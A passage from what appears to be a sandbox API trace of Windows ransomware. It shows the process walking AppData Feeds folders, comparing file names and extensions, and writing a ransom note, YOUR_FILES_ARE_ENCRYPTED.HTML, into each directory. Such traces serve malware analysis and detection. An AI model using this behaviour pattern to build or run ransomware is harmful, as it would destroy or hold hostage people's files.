Feeds~\\Microsoft at Work~.feed-ms") returned 97 [0159.122] lstrcmpW (lpString1="Microsoft at Work~.feed-ms", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.122] PathFindExtensionW (pszPath="Microsoft at Work~.feed-ms") returned=".feed-ms" [0159.122] lstrlenW (lpString=".feed-ms") returned 8 [0159.122] PathFindExtensionW (pszPath="Microsoft at Work~.feed-ms") returned=".feed-ms" [0159.122] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd25f1b90, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd25f1b90, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8abd5021, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x7000, dwReserved0=0x0, dwReserved1=0x60, cFileName="MSNBC News~.feed-ms", cAlternateFileName="MSNBCN~1.FEE")) returned 1 [0159.122] wnsprintfW (in: pszDest=0x7422068, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\MSNBC News~.feed-ms") returned 90 [0159.122] lstrcmpW (lpString1="MSNBC News~.feed-ms", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.122] PathFindExtensionW (pszPath="MSNBC News~.feed-ms") returned=".feed-ms" [0159.122] lstrlenW (lpString=".feed-ms") returned 8 [0159.122] PathFindExtensionW (pszPath="MSNBC News~.feed-ms") returned=".feed-ms" [0159.122] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd25f1b90, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd25f1b90, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8abd5021, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x7000, dwReserved0=0x0, dwReserved1=0x60, cFileName="MSNBC News~.feed-ms", 
cAlternateFileName="MSNBCN~1.FEE")) returned 0 [0159.122] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0159.124] wnsprintfW (in: pszDest=0x7422068, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 100 [0159.124] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a8 [0159.126] WriteFile (in: hFile=0x5a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd4fc, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd4fc*=0x3c00, lpOverlapped=0x0) returned 1 [0159.128] CloseHandle (hObject=0x5a8) returned 1 [0159.128] GetProcessHeap () returned 0x270000 [0159.130] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7422068 | out: hHeap=0x270000) returned 1 [0159.130] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xd23dc850, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23dc850, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8acdf9c3, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", cAlternateFileName="{5588A~1")) returned 1 [0159.130] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~") returned 93 
[0159.130] GetProcessHeap () returned 0x270000 [0159.130] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7422068 [0159.130] lstrcpyW (in: lpString1=0x7422068, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~" [0159.130] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\*" [0159.130] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xd23dc850, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23dc850, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8acdf9c3, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0159.130] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xd23dc850, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23dc850, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8acdf9c3, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, 
dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0159.130] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xd23dc850, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd25f1b90, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8acdf9c3, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="WebSlices~", cAlternateFileName="WEBSLI~1")) returned 1 [0159.130] wnsprintfW (in: pszDest=0x7422068, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~") returned 104 [0159.130] GetProcessHeap () returned 0x270000 [0159.130] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7432070 [0159.131] lstrcpyW (in: lpString1=0x7432070, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~" [0159.131] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\*" [0159.131] FindFirstFileW (in: 
lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xd23dc850, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd25f1b90, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8acdf9c3, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0159.131] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xd23dc850, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd25f1b90, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8acdf9c3, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0159.131] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd25f1b90, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd25f1b90, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8ad2bc83, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x7000, dwReserved0=0x0, dwReserved1=0x60, cFileName="Web Slice Gallery~.feed-ms", cAlternateFileName="WEBSLI~1.FEE")) returned 1 [0159.131] wnsprintfW (in: pszDest=0x7432070, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Web Slice Gallery~.feed-ms") returned 131 [0159.131] lstrcmpW (lpString1="Web Slice Gallery~.feed-ms", 
lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.131] PathFindExtensionW (pszPath="Web Slice Gallery~.feed-ms") returned=".feed-ms" [0159.131] lstrlenW (lpString=".feed-ms") returned 8 [0159.132] PathFindExtensionW (pszPath="Web Slice Gallery~.feed-ms") returned=".feed-ms" [0159.132] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd25f1b90, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd25f1b90, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8ad2bc83, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x7000, dwReserved0=0x0, dwReserved1=0x60, cFileName="Web Slice Gallery~.feed-ms", cAlternateFileName="WEBSLI~1.FEE")) returned 0 [0159.132] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0159.132] wnsprintfW (in: pszDest=0x7432070, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 134 [0159.132] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\webslices~\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x590 [0159.132] WriteFile (in: hFile=0x590, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0159.135] CloseHandle (hObject=0x590) returned 1 [0159.135] GetProcessHeap () 
returned 0x270000 [0159.136] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7432070 | out: hHeap=0x270000) returned 1 [0159.136] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xd23dc850, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd25f1b90, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8acdf9c3, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="WebSlices~", cAlternateFileName="WEBSLI~1")) returned 0 [0159.136] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0159.140] wnsprintfW (in: pszDest=0x7422068, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 123 [0159.140] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a8 [0159.141] WriteFile (in: hFile=0x5a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd4fc, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd4fc*=0x3c00, lpOverlapped=0x0) returned 1 [0159.143] CloseHandle (hObject=0x5a8) returned 1 [0159.143] GetProcessHeap () returned 0x270000 [0159.145] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7422068 | out: hHeap=0x270000) returned 1 [0159.147] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: 
lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xd23dc850, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23dc850, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8acdf9c3, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", cAlternateFileName="{5588A~1")) returned 0 [0159.147] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0159.151] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 83 [0159.151] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\feeds\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a8 [0159.152] WriteFile (in: hFile=0x4a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0159.154] CloseHandle (hObject=0x4a8) returned 1 [0159.154] GetProcessHeap () returned 0x270000 [0159.155] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75f0050 | out: hHeap=0x270000) returned 1 [0159.156] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xd23dc850, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd25f1b90, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a8b533b, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, 
nFileSizeLow=0x0, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="Feeds Cache", cAlternateFileName="FEEDSC~1")) returned 1 [0159.156] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache") returned 59 [0159.156] GetProcessHeap () returned 0x270000 [0159.156] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75f0050 [0159.156] lstrcpyW (in: lpString1=0x75f0050, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache" [0159.156] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache\\*" [0159.156] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xd23dc850, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd25f1b90, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a8b533b, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0159.156] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xd23dc850, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd25f1b90, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a8b533b, 
ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0159.157] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xd23dc850, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd25f1b90, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8aa5825e, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="4CSSRV00", cAlternateFileName="")) returned 1 [0159.157] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache\\4CSSRV00") returned 68 [0159.157] GetProcessHeap () returned 0x270000 [0159.157] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7422068 [0159.160] lstrcpyW (in: lpString1=0x7422068, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache\\4CSSRV00" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache\\4CSSRV00") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache\\4CSSRV00" [0159.160] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache\\4CSSRV00", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache\\4CSSRV00\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache\\4CSSRV00\\*" [0159.160] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache\\4CSSRV00\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xd23dc850, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd25f1b90, 
ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8aa5825e, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0159.160] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xd23dc850, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd25f1b90, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8aa5825e, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0159.161] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0xd25f1b90, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd25f1b90, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a88f1db, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x43, dwReserved0=0x0, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0159.161] wnsprintfW (in: pszDest=0x7422068, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache\\4CSSRV00\\desktop.ini") returned 80 [0159.161] lstrcmpW (lpString1="desktop.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.161] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0159.161] lstrlenW (lpString=".ini") returned 4 [0159.161] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0159.161] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd25f1b90, ftCreationTime.dwHighDateTime=0x1d70517, 
ftLastAccessTime.dwLowDateTime=0xd25f1b90, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8aa5825e, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="fwlink[1]", cAlternateFileName="FWLINK~1")) returned 1 [0159.161] wnsprintfW (in: pszDest=0x7422068, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache\\4CSSRV00\\fwlink[1]") returned 78 [0159.161] lstrcmpW (lpString1="fwlink[1]", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.161] PathFindExtensionW (pszPath="fwlink[1]") returned="" [0159.161] lstrlenW (lpString="") returned 0 [0159.161] PathFindExtensionW (pszPath="fwlink[1]") returned="" [0159.161] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd25f1b90, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd25f1b90, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8aa5825e, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="fwlink[1]", cAlternateFileName="FWLINK~1")) returned 0 [0159.161] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0159.161] wnsprintfW (in: pszDest=0x7422068, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache\\4CSSRV00\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 98 [0159.161] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache\\4CSSRV00\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\feeds cache\\4cssrv00\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, 
